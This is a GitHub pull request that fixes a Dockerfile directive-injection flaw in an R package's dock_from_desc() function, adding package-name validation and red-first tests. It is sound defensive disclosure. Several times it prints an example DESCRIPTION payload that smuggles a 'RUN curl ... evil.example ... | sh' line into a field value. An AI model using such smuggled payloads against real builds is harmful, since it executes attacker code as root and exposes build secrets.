Skip to content

fix(security): validate the package name read from the DESCRIPTION#113

Merged
VincentGuyader merged 1 commit into
masterfrom
fix/desc-package-name-injection
May 12, 2026
Merged

fix(security): validate the package name read from the DESCRIPTION#113
VincentGuyader merged 1 commit into
masterfrom
fix/desc-package-name-injection

Conversation

@VincentGuyader
Copy link
Copy Markdown
Member

Security fix — HIGH severity

Found by an internal full-codebase security audit during 0.3.0 CRAN prep. Same class as #112, on the dock_from_desc() side.

The bug

dock_from_desc(build_from_source = FALSE) interpolates the package name from the DESCRIPTION into the generated COPY directive:

dock$COPY(from = paste0(read.dcf(path)[1], "_*.tar.gz"), to = "/app.tar.gz")

read.dcf() joins DCF continuation lines with \n. So a DESCRIPTION like:

Package: app
 RUN curl -s https://evil.example/x.sh | sh #
Version: 1.0.0
Title: Demo
...

makes read.dcf(path)[1] return "app\nRUN curl -s https://evil.example/x.sh | sh #", and glue("COPY {from} {to}") then yields two Dockerfile lines:

COPY app
RUN curl -s https://evil.example/x.sh | sh #_*.tar.gz /app.tar.gz

docker build executes the injected RUN ... | sh as root in the build container — access to build secrets, mounted SSH keys, supply-chain poisoning of the produced image. The trailing #_*.tar.gz /app.tar.gz is a shell comment. The DESCRIPTION is a plausible attacker artifact (received from a colleague, vendored, a CI cache, a cloned tarball). The same unvalidated field also feeds the list.files() cleanup glob (sprintf("%s_.+.tar.gz", read.dcf(path)[1])) — secondary, lower impact.

Verified empirically: a crafted DESCRIPTION produces exactly the two-line Dockerfile above.

The fix

Add .validate_pkg_name() enforcing the CRAN package-name grammar ^[a-zA-Z][a-zA-Z0-9.]*$ (letters, digits and dots only, starting with a letter — excludes whitespace, newlines and every shell/Dockerfile metacharacter), and call it on the package name at dock_from_desc() entry. The validated value is read once and reused for the COPY directive, the cleanup glob, and the "tar.gz created" message.

Test (red-first)

tests/testthat/test-dock_from_desc.R: a DESCRIPTION whose Package: field carries a continuation-line RUN payload must raise the package-name validation error rather than reaching the Dockerfile.

  • Red (verified against the unpatched function): no error raised, the payload landed in the generated COPY line as "COPY app\nRUN curl ... #_*.tar.gz /app.tar.gz".
  • Green (after the fix): .validate_pkg_name() raises; benign DESCRIPTION still produces COPY <pkg>_*.tar.gz /app.tar.gz.

Full test suite: 0 failures (3 pre-existing warnings only — 2 deliberate "warns when path missing" tests + an rlang lifecycle deprecation from a dependency). R CMD check: 0/0/0 (one transient "unable to verify current time" host NOTE, unrelated).

Test plan

  • Red-first test fails against unpatched code for the right reason (payload reaches the Dockerfile).
  • Green after fix; benign DESCRIPTION regression passes.
  • Full devtools::test(): 0 failures.
  • R CMD check: expecting 0/0/0 (running).
  • pr-reviewer agent.
  • Copilot review.
  • Consider folding into the GHSA advisory alongside fix(security): validate the renv version resolved from the lockfile #112's dock_from_renv() fix (both: a crafted renv.lock / DESCRIPTION could execute commands at docker build time; both fixed in 0.3.0, no published version carried the gap).

NEWS

Added under ## Security in NEWS.md (0.3.0).

@VincentGuyader
Copy link
Copy Markdown
Member Author

/copilot review

@VincentGuyader VincentGuyader force-pushed the fix/desc-package-name-injection branch from 0dab5d4 to 4df39e8 Compare May 11, 2026 18:18
@VincentGuyader
Copy link
Copy Markdown
Member Author

Force-pushed 4df39e8: extended the fix per pr-reviewer — the dependency-field names (Imports: / Depends: / Suggests: / LinkingTo:) were the same injection class on the default build_from_source = TRUE path (desc::desc_get_deps() joins DCF continuation lines with \\n, and an unknown name flows raw into the generated remotes::install_version("<name>", ...) RUN). Added .validate_pkg_names() (vectorised, same CRAN grammar) applied to the dependency list at function entry, plus a second red-first test for that path (verified red: RUN Rscript -e '...install_version("evilpkg\\n RUN curl ... #", ...)' landed in the Dockerfile). NEWS bullet widened + "predates 0.3.0" added. Full suite: 0 failures. R CMD check: 0/0/0 (transient host NOTE).

@VincentGuyader
Copy link
Copy Markdown
Member Author

/copilot review

Copy link
Copy Markdown

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR addresses a high-severity Dockerfile directive-injection vulnerability in dock_from_desc() by validating the Package field (and dependency package names) read from an untrusted DESCRIPTION, preventing newline/continuation-line payloads from being interpolated into generated Dockerfile directives.

Changes:

  • Added .validate_pkg_name() / .validate_pkg_names() enforcing CRAN package-name grammar and used them early in dock_from_desc().
  • Reused the validated package name for the tarball COPY source, cleanup glob, and user-facing “tar.gz created” message.
  • Added regression tests covering continuation-line injection via Package: and Imports:; documented the fix in NEWS.md.

Reviewed changes

Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.

File Description
R/dock_from_desc.R Reads/validates package/dependency names up front and reuses the validated package name in Dockerfile generation and tarball cleanup.
R/utils.R Adds internal validators for DESCRIPTION package name(s) using CRAN grammar.
tests/testthat/test-dock_from_desc.R Adds red/green tests to ensure crafted continuation-line payloads are rejected.
NEWS.md Documents the security fix under the 0.3.0 Security section.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Comment thread R/dock_from_desc.R Outdated
if (update_tar_gz) {
old_version <- list.files(
pattern = sprintf("%s_.+.tar.gz", read.dcf(path)[1]),
pattern = sprintf("%s_.+.tar.gz", pkg_name),
Comment thread R/dock_from_desc.R Outdated
# tar.gz-cleanup glob below for `build_from_source = FALSE`; validate
# it up front so a crafted `Package:` field cannot inject an extra
# Dockerfile directive.
pkg_name <- read.dcf(path)[1]
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:

1. `build_from_source = FALSE`: the `Package:` field goes into the
   `COPY <pkg>_*.tar.gz /app.tar.gz` directive and the `list.files()`
   tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
   `Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
   (`desc::desc_get_deps(path)$package`) goes into a generated
   `remotes::install_version("<name>", ...)` install RUN.

`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as

    Package: app
     RUN curl -s https://evil.example/x.sh | sh #

or

    Imports:
        evilpkg
         RUN curl -s https://evil.example/x.sh | sh #

yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.

Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.

Two related hardening tweaks on the same code path:
- Read the `Package:` field by name (`read.dcf(path)[1L, "Package"]`)
  instead of positionally (`read.dcf(path)[1]`): DCF field order is
  not guaranteed, so a `DESCRIPTION` with `Type:` / `Encoding:` ahead
  of `Package:` would otherwise validate and reuse the wrong value.
- Build the tar.gz-cleanup `list.files()` pattern from a glob
  (`glob2rx(sprintf("%s_*.tar.gz", pkg_name))`) instead of a raw
  `sprintf("%s_.+.tar.gz", pkg_name)`: a dot in `pkg_name` (allowed by
  the CRAN grammar, e.g. `R.utils`) was being treated as a regex
  wildcard and could `file.remove()` a sibling package's tarball
  (`RZutils_*.tar.gz`).

Tests added (red-first): a `DESCRIPTION` whose `Package:` field,
resp. whose `Imports:` field, carries a continuation-line `RUN`
payload must raise the package-name validation error rather than
reaching the Dockerfile (verified red against the unpatched function
-- the payload landed in the generated Dockerfile as a standalone
`RUN` line -- and green after the fix); and `dock_from_desc(..., update_tar_gz = TRUE)`
for `Package: R.utils` must not delete a sibling `RZutils_*.tar.gz`
(verified red against the `sprintf` pattern, green after `glob2rx`).
Benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
@VincentGuyader VincentGuyader force-pushed the fix/desc-package-name-injection branch from 4df39e8 to 865c8de Compare May 11, 2026 19:15
@VincentGuyader
Copy link
Copy Markdown
Member Author

Force-pushed 865c8de: folded in the two Copilot review nits (both pre-existing, both on lines this PR already touched), via copilot-feedback triage:

  1. read.dcf(path)[1]read.dcf(path)[1L, "Package"] — index the Package: field by name, not by DCF position.
  2. list.files(pattern = sprintf("%s_.+.tar.gz", pkg_name))list.files(pattern = glob2rx(sprintf("%s_*.tar.gz", pkg_name))) — a dot in a CRAN-legal package name (R.utils) was a regex wildcard that could sweep a sibling RZutils_*.tar.gz. Added a third red-first test (R.utils must not delete RZutils_0.9.0.tar.gz; verified red against the sprintf pattern, green after glob2rx). @importFrom utils glob2rx + NAMESPACE updated. Full suite: 0 failures. R CMD check: running, expecting 0/0/0.

(copilot-feedback also factorized both into pr-reviewer.md: check #24 extended to cover pattern= interpolation, new check #41 for positional indexing into parsed structured files, calibration rows 50-51.)

@VincentGuyader
Copy link
Copy Markdown
Member Author

/copilot review

Copy link
Copy Markdown

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Copilot reviewed 5 out of 5 changed files in this pull request and generated no new comments.

@VincentGuyader VincentGuyader merged commit 03d15db into master May 12, 2026
10 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants